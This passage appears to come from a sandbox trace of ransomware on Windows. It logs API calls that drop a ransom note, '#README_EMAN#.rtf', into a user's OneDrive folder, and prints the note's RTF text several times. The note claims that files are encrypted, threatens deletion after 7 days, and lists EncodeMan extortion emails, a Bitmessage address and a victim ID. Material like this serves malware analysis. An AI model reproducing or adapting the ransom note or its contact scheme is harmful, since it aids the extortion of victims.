COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.954] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248a258, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nGoH\x93Ò\x14FE¶\x8a\x10Oå \x18¸a¸éP\x10úÈ\x13\n", lpUsedDefaultChar=0x0) returned 8717 [0298.954] WriteFile (in: hFile=0x27c, lpBuffer=0x248a258*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248a258*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.955] CloseHandle (hObject=0x27c) returned 1 [0298.955] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lt\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\lt\\#readme_eman#.rtf")) returned 0xffffffff [0298.955] GetLastError () returned 0x2 [0298.955] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lt\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\lt\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0298.956] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 